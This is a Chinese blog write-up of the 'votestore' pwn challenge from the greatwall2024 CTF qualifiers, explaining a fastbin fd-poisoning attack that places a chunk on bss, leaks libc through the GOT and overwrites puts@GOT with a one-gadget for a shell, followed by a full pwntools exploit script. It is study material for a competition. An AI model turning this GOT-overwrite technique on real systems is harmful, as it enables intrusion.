greatwall2024 初赛 - votestore

greatwall2024 初赛 - votestore

RocketDev

文件属性

属性
Arch x64
RELRO Partial
Canary on
NX on
PIE off
strip yes
libc 2.23-0ubuntu3

解题思路

只有一个chunk,是固定大小的0x36(即分配size为0x41的chunk),由于字节错位所要求的size为0x71, 故不可能通过字节错位来打

看了一下bss上的数据,突然意识到got是可写的,那么就不需要打mallocHook,只要把puts的地址改成oneGadget, 就可以拿到shell了

程序中有一个限制操作次数的变量,记为interact,在查看数据时不难看出interact和堆指针ptr是放在一起的:

如果视0x6010a0为chunk头,那么只要反复交互,使interact达到0x41就可以过堆块验证

那么先释放掉堆块后改fd0x6010a0就可以将堆块分配到bss上,接下来malloc以后我们就能操作ptr了。 将ptr修改为0x601020show,就可以读出puts@libc,然后计算libcBase,在原地写上oneGadget, 就可以拿到shell了

EXPLOIT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *
context.terminal = ['tmux','splitw','-h']
GOLD_TEXT = lambda x: f'\x1b[33m{x}\x1b[0m'

def payload(lo:int):
global sh
if lo:
sh = process('./votestore')
if lo & 2:
gdb.attach(sh)
else:
context.proxy = (socks.SOCKS5, '127.0.0.1', 1080)
sh = remote('192.168.16.186', 9999)
libc = ELF('./votestore.so')

def addn(hooked:bool=False):
sh.sendlineafter(b'ice :', b'1')

def edit(f1:bytes, f2:bytes, shell:bool=False):
sh.sendlineafter(b'ice :', b'2')
sh.sendafter(b'name:', f1)
if shell:
return
sh.sendafter(b'data:', f2)

def deln():
sh.sendlineafter(b'ice :', b'3')

def show() -> tuple[bytes]:
sh.sendlineafter(b'ice :', b'4')
sh.recvuntil(b'name:')
name = sh.recvline()
sh.recvuntil(b'data:')
data = sh.recvline()
return name, data

def eout():
sh.sendlineafter(b'ice :', b'5')

# increase interaction time
addn()
deln()
for _ in range(0x40 - 3):
show()

# alloc at bss 0x6010a0 and mod the ptr to 0x601020(puts@libc)
edit(p64(0x6010a0), b'nodata')
addn()
addn()
edit(p64(0x601020), b'nodata')
# edit(p64(0x601040), p64(0x4006f6)) # testing other libc addr

# then read out the libc(puts) on got and calc one gadget
puts, f2 = show()
debug(f'{puts = }; {f2 = }')
libcBase = u64(puts[:6] + b'\0\0') - libc.symbols['puts']
success(GOLD_TEXT(f'Leak libc: {hex(libcBase)}'))
ogg = 0xef9f4
oneGadget = libcBase + ogg

# now edit puts as one gadget so puts@plt triggers shell
edit(p64(oneGadget), p64(oneGadget), True) # when writing data calls puts
sh.clean()
sh.interactive()

又是本地通远程不通...
打远程的时候发现libcBase完全错误,想拿远程的各种地址推测libc,结果少约束几个地址吧, 候选项太多,多约束几个地址吧,一个匹配的都没了,严重怀疑主办方没有验证题目的正确性

  • 标题: greatwall2024 初赛 - votestore
  • 作者: RocketDev
  • 创建于 : 2024-03-31 22:21:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketma.dev/2024/03/31/votestore/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
greatwall2024 初赛 - votestore